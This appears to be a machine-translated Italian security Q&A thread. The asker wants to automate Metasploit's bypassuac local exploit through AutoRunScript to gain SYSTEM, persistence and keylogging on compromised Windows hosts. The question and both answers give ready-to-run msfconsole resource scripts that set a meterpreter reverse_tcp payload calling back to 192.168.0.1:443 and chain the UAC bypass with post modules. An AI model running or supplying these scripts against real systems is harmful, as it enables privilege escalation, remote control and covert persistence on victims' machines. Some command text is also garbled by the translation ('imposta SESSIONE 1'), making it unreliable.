Come eseguire exploit / windows / local / bypassuac usando AutoRunScript?

5

C'è un modo per eseguire exploit che richiedono parametri, come quello nel titolo, usando AutoRunScript?

Sono riuscito a utilizzare AutoRunScript per eseguire perfettamente alcuni comandi di post, come keylog_recorder o checkvm .

Ma quando ho aggiunto il mio script questo:

use exploit/windows/local/bypassuac
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1
set LPORT 443
set DisablePayloadHandler true
set SESSION 1
set TECHNIQUE EXE
set ExitOnSession false
exploit

Ho capito:

[*]     Running command use exploit/windows/local/bypassuac
Loading extension exploit/windows/local/bypassuac...
[-] Failed to load extension: No module of the name ext_server_exploit/windows/local/bypassuac.x86.dll found
[*]     Running command set TARGET 0
[-] Unknown command: set.
[*]     Running command set PAYLOAD windows/meterpreter/reverse_tcp
[-] Unknown command: set.

Chiaramente mi manca qualcosa qui. Come posso fare questo? Il mio obiettivo è quello di essere in grado di bypassare UAC, utilizzare getsystem e quindi ottenere un punto d'appoggio utilizzando le opzioni di persistenza.

Come nota a margine, capisco che l'utilizzo di "imposta SESSIONE 1" funzionerà solo per il primo computer nel coinvolgimento. Avrei bisogno di usare in qualche modo una variabile per fare riferimento alla sessione attualmente in fase di avvio.

Qualcuno ha qualche soluzione per questo?

    
posta user342872 03.11.2015 - 02:18
fonte

2 risposte

2

Devi dare le opzioni direttamente dove stai impostando AutoRunScript.

msf exploit(handler) > set AutoRunScript exploit/windows/local/bypassuac LHOST=192.168.0.1 LPORT=443
    
risposta data 12.11.2015 - 07:16
fonte
1

Non è possibile eseguire quei comandi in un AutoRunScript perché sono comandi alla msfconsole, mentre AutoScriptRun funziona solo nel contesto di meterpreter. Quindi, avresti bisogno di qualcosa come questi:

#msfconsole.rc
   #Configure your listener and payload
   use multi/handler
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST 192.168.0.1
   set LPORT 443
   set AutoRunScript auto.rc
   exploit -j
   use exploit/windows/local/bypassuac
   set TARGET 0
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST 192.168.0.1
   set LPORT 443
   set DisablePayloadHandler true
   set SESSION 1
   set TECHNIQUE EXE
   set ExitOnSession false
   #here you can also set another AutoRunScript for your new payload
   exploit

E su auto.rc puoi inserire cose come:

#auto.rc

sysinfo
checkvm

E qualsiasi altro comando meterpreter o modulo post.

    
risposta data 04.11.2015 - 02:02
fonte

Leggi altre domande sui tag